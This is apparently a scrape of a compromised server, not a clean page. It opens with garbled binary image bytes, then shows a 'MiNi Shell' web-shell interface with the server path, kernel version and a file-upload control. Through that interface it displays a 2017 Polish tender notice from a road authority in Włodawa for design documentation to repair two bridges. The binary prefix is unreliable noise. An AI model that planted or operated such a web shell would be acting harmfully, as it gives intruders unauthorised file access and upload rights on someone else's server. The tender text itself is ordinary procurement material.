JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170321/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170321/47726-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.zdw.bip.lubelskie.pl' target='_blank'>http://www.zdw.bip.lubelskie.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 47726 - 2017
              z dnia 2017-03-21 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Włodawa: Opracowanie dokumentacji projektowej (budowlanej i wykonawczej)na remont mostów w m. Zbereże i Sosnowica na rz. Piwonia<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              nieobowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Zarząd Dróg Wojewódzkich Lublin Rejon Dróg Wojewódzkich we Włodawie, krajowy numer identyfikacyjny
              16771100000, ul.
              ul. Lubelska 
              60,
              22200  
              Włodawa, woj.
              lubelskie, państwo
              Polska, tel.
              082 5721635, 5721151, e-mail
              rdw.wlodawa@zdw.lublin.pl, faks
              825 721 793.
              <br />
              Adres strony internetowej (URL): www.zdw.lublin.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Samorządowa jednostka budżetowa</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.zdw.bip.lubelskie.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.zdw.bip.lubelskie.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Opracowanie dokumentacji projektowej (budowlanej i wykonawczej)na remont mostów w m. Zbereże i Sosnowica na rz. Piwonia<br /><b>Numer referencyjny: </b>R7.ST.372.9.2017.ek<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Część I  Zadanie Nr 1 - opracowanie dokumentacji projektowej na remont mostu  przez rzekę Piwonię w m. Sosnowica w ciągu drogi  wojewódzkiej Nr 819; Parczew - Przewłoka  Sosnowica - Kołacze  Wola Uhruska , w km  19+147
A.Stan istniejący:
A.1. Konstrukcja mostu:
Most jednoprzęsłowy o schemacie statycznym belkowym swobodnie podpartym bez wsporników. Konstrukcja płytowa, płyta monolityczna o pełnym przekroju.
Podpory pełnościenne o korpusie pełnym;.
Nośność wg ewid. 30 ton;
Most wybudowany w 1959 roku;
A.2. Podstawowe parametry techniczno- użytkowe mostu:
rozpiętość teoretyczna 6,90 m;
szerokość całkowita  11,40 m;
w tym : jezdnia 6,25m i obustronne opaski 2x0,50 m.
B.Zakres opracowania:
B.1. Sporządzenie materiałów zgłoszeniowych (do dokonania zgłoszenia remontu istniejącego mostu do Lubelskiego Urzędu Wojewódzkiego w Lublinie Wydział Infrastruktury  w ilości 2 egz.
B.2. Opracowanie projektu wykonawczego z pełną inwentaryzacją uszkodzeń obiektu 
(z  uwzględnieniem minimalnych robót na dojazdach) - w ilości 4 egz.
Projekt wykonawczy należy opracować przy zachowaniu podstawowych  parametrów techniczno  użytkowych  obiektu. Projekt wykonawczy powinien obejmować kompleksowy remont mostu,  a w  szczególności:
wymianę izolacji i nawierzchni,
remont płyty(nadbeton płyty), belek podporęczowych z wymianą istniejących poręczy  na barieroporęcze,
naprawę i zabezpieczenie antykorozyjne konstrukcji betonowych /płyta, przyczółki/,
wykonanie dylatacji,
remont stożków, schodów i urządzeń odwadniających
korektę niwelety na dojazdach w zakresie minimalnym koniecznym do dostosowania jej do niwelety na moście.
zabezpieczenie wodociągu na czas remontu.
wykonanie nowych zawiesi wodociągu dostosowanych do remontowanego mostu.
zabezpieczenie antykorozyjne wodociągu.
B.3.Opracowanie kosztorysu inwestorskiego w formacie Norma PRO   w ilości 2 egz.
B.4.Przedmiar robót  w ilości 4 egz.
B.5.Kosztorys ofertowy  w ilości 4 egz.
B.6.Specyfikacje techniczne wykonania i odbioru robót budowlanychw ilości 4 egz.
B.7.Projekt organizacji ruchu na czas prowadzonych robót (przewidzieć wykonanie robót przy zachowaniu ciągłości ruchu na obiekcie), zatwierdzony przez Dyrektora Zarządu Dróg - w ilości 4 egz.
2) Część II  Zadanie Nr 2  -  opracowanie dokumentacji projektowej na remont mostu  przez rzekę rów bez nazwy w m. Zbereże w ciągu drogi  wojewódzkiej Nr 816;
Terespol - Kodeń - Sławatycze - Włodawa  Dorohusk  Zosin, w km 85+789
A. Stan istniejący:
A.1. Konstrukcja mostu:
Most jednoprzęsłowy o schemacie statycznym belkowym swobodnie podpartym bez wsporników. Konstrukcja płytowa, płyta monolityczna o pełnym przekroju          typu GROMNIK.
Podpory pełnościenne o korpusie pełnym;
Nośność wg ewid. 30 ton;
Most wybudowany w 1978 roku;
A.2. Podstawowe parametry techniczno- użytkowe mostu:
rozpiętość teoretyczna 12,30 m;
szerokość całkowita  9,40 m;
w tym : jezdnia 5,5m i obustronne opaski o wymiarach : 2,45 m i  1,0 m.
B. Zakres opracowania:
B.1. Sporządzenie materiałów zgłoszeniowych (do dokonania zgłoszenia remontu istniejącego mostu do Lubelskiego Urzędu Wojewódzkiego w Lublinie Wydział Infrastruktury  w ilości 2 egz.
B.2. Opracowanie projektu wykonawczego z pełną inwentaryzacją uszkodzeń obiektu 
(z uwzględnieniem minimalnych robót na dojazdach) - w ilości 4 egz.
Projekt wykonawczy należy opracować przy zachowaniu podstawowych parametrów techniczno  użytkowych obiektu. Projekt wykonawczy powinien obejmować kompleksowy remont mostu, a w szczególności:
wymianę izolacji i nawierzchni;
remont płyty, (nadbeton płyty) belek podporęczowych z wymianą istniejących poręczy  na barieroporęcze;
naprawę i zabezpieczenie antykorozyjne konstrukcji betonowych /płyta, przyczółki/;
wykonanie dylatacji;
remont stożków, schodów i urządzeń odwadniających;
korektę niwelety na dojazdach w zakresie minimalnym koniecznym do dostosowania jej do niwelety na moście.
B.3.Opracowanie kosztorysu inwestorskiego w formacie Norma PRO  w ilości 2 egz.
B.4.Przedmiar robót  w ilości 4 egz.
B.5.Kosztorys ofertowy  w ilości 4 egz.
B.6.Specyfikacje techniczne wykonania i odbioru robót budowlanych w ilości 4 egz. 
B.7.Projekt organizacji ruchu na czas prowadzonych robót  zatwierdzony przez Dyrektora Zarządu Dróg Wojewódzkich w Lublinie (przewidzieć wykonanie robót przy zachowaniu ciągłości ruchu na obiekcie)   w ilości 4 egz.
2. Do zakresu każdej części zamówienia należy:
1) wszystkie elementy składowe dokumentacji projektowej zapisać w formie cyfrowej na CD/DVD w 1 egz. Dokumentacja zapisana na płycie CD/DVD winna być zaopatrzona w
spis określający szczegółową zawartość (nazwa dokumentacji, nazwa załącznika i nazwa pliku w którym został zapisany).
Wszystkie materiały tekstowe takie jak: opisy techniczne, obliczenia, specyfikacje
Techniczne  itp. należy zapisać w formacie Microsoft Word lub Microsoft Excel . 
Rysunki powinny być zapisane w formacie DWG.
Ponadto zawartość dokumentacji / opisy, rysunki, specyfikacje, przedmiary itp./ powinna być zapisana w formacie PDF w jednym bądź kilku plikach w odpowiednim katalogu.
2) Wykonawca swoim staraniem uzyska i poniesie koszty wszelkich niezbędnych do
projektowana  danych wyjściowych, materiałów , warunków technicznych, uzgodnień tj.:
 uzyskanie wypisu i wyrysu z Miejscowego Planu Zagospodarowania Przestrzennego 
oraz skróconego wypisu z ewidencji gruntów dla działek na których będzie realizowane zadanie;
 uzyskanie mapy w skali 1:500 (1000);
 uzyskanie niezbędnych warunków i uzgodnień m.in. w WZMiUW  w Lublinie       
 uzgodnienie przekroju poprzecznego w ZDW Lublin.
3. Przy opisywaniu rozwiązań projektowych Wykonawca nie będzie wskazywał znaków
towarowych, patentów lub pochodzenia, chyba że jest to uzasadnione specyfiką przedmiotu zamówienia lub gdy nie może opisać urządzenia lub materiału za pomocą dostatecznie dokładnych określeń. W przypadku takiego wskazania jak powyżej, we wszystkich  dokumentach wchodzących w skład przedmiotu zamówienia, należy zawrzeć określenie lub równoważny, co w konsekwencji powoduje, że wymieniony konkretny produkt otrzymuje  charakter jedynie przykładowy. W przypadku zastosowania rozwiązań równoważnych Wykonawca zobowiązany jest podać parametry równoważności.
Ponadto Wykonawca przy opisywaniu rozwiązań projektowych zobowiązany jest do stosowania art. 30 ustawy Pzp.
Wykonawca, który powołuje się na rozwiązania równoważne opisywane przez Zamawiającego jest obowiązany wykazać, że oferowane usługi spełniają wymagania określone przez Zamawiającego.
<br /><br /><b>II.5) Główny kod CPV: </b>71322300-4<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              48044.50<br />
              Waluta:
              <br /><div style="padding-left: 20px">PLN<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 45<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie określa warunku w tym zakresie<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie określa warunku w tym zakresie<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający wymaga aby Wykonawca spełniał wymienione poniżej minimalne poziomy 
zdolności dotyczące wykształcenia, kwalifikacji zawodowych, doświadczenia, potencjału technicznego Wykonawcy umożliwiające realizację zamówienia na odpowiednim poziomie jakości.
Wykonawca wykażę, że:
a)w okresie ostatnich 3 lat przed upływem terminu  składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie wykonał minimum:
- jedną usługę odpowiadającą zakresowi zamówienia, której wartość wyniosła co
najmniej 20 tys. zł netto i udokumentuje, że usługa ta wykonana została należycie;
b)  osoba skierowana przez Wykonawcę do realizacji zamówienia posiadająca co najmniej  letnie doświadczenie w projektowaniu i uprawnienia do projektowania bez ograniczeń w specjalności mostowej oraz, która wykonała minimum jedną dokumentację odpowiadającą swoim  zakresem zakresowi zamówienia wraz z informacją o podstawie do dysponowania tą osobą;
Zamawiający określając wymogi dla osoby w zakresie posiadanych uprawnień, dopuszcza odpowiadające im uprawnienia projektowe, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane (Dz. U. 2016 poz. 290 j.t.) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. Z 2008 r. Nr 63, poz. 394). Zamawiający dopuszcza łącznie spełnianie wymagań przez jedną osobę zgodnie z posiadanymi uprawnieniami.
Wykonawca potwierdza w ofercie spełnianie określonych powyżej warunków składając Oświadczenie o którym mowa w pkt. VII.1. SIWZ oraz wskazując w ofercie imiona i nazwiska osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1. Odpis z właściwego rejestru lub z centralnej ewidencji informacji o działalności   gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt. 1) ustawy Pzp.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1.Zdolności technicznej lub zawodowej:
 wykaz usług obejmujących swoim rodzajem przedmiot zamówienia, wykonanych nie
wcześniej niż  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym  okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na  rzecz których usługi te zostały wykonane, z załączeniem dowodów określających czy te usługi zostały wykonane należycie,przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty (np. oświadczenie Wykonawcy). Dokumenty potwierdzające należyte wykonanie usług powinny być wydane nie wcześniej niż 3 m-ce przed upływem terminu składania ofert.
  oświadczenie na temat wykształcenia i kwalifikacji zawodowych Wykonawcy lub kadry kierowniczej Wykonawcy
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1.Zobowiązanie innych podmiotów  -  (jeżeli dotyczy)
2.  Pełnomocnictwo, jeżeli oferta będzie podpisana przez pełnomocnika podmiotów  występujących  wspólnie (konsorcja, spółki cywilne) zgodnie z obowiązkiem wynikającym z art. 23 ust. 2 ustawy Pzp lub w imieniu Wykonawcy jeżeli ofertę i załączone do niej dokumenty podpisują osoby nie  ujawnione w rejestrze lub ewidencji, do oferty należy dołączyć stosowne pełnomocnictwa udzielone przez osobę/osoby ujawnioną w rejestrze lub ewidencji), pełnomocnictwo musi zawierać stwierdzenie, że upełnomocnieni są uprawnieni do zaciągania zobowiązań w imieniu
Wykonawcy lub podmiotów występujących wspólnie;
3. Wykaz dokumentów, które Wykonawca zastrzega, jako niejawne dla innych uczestników postępowania i osób trzecich (poza członkami komisji przetargowej), stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej  konkurencji, jeżeli Wykonawca, nie później niż w terminie składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu, zastrzegł, że nie mogą być one udostępniane. Wykonawca nie może zastrzec informacji, o których mowa w art. 86 ust. 4 ustawy Pzp.
4.Oświadczenie o przynależności lub  braku przynależności do tej samej grupy kapitałowej, które Wykonawca przekazuje Zamawiającemu w terminie 3 dni od dnia
zamieszczenia przez Zamawiającego na stronie internetowej informacji, dotyczących:
 kwoty, jaką zamierza przeznaczyć na sfinansowanie zamówienia;
 firm oraz adresów Wykonawców, którzy złożyli oferty w terminie;
 ceny, terminu wykonania zamówienia, okresu gwarancji i warunków płatności
zawartych w ofertach,
Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania 
z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.
II Dokumenty podmiotów zagranicznych
1.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa:
w pkt. VII.2.1. SIWZ składa dokument lub dokumenty wystawione w kraju, w którym ma  siedzibę lub miejsce zamieszkania, potwierdzający, że nie otwarto jego likwidacji ani nie  ogłoszono upadłości  wystawiony nie wcześniej niż 6 miesięcy przed upływem  terminu składania ofert
2.Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa pkt. VII.6.1. zastępuje się je dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy lub miejsce zamieszkania tej osoby.
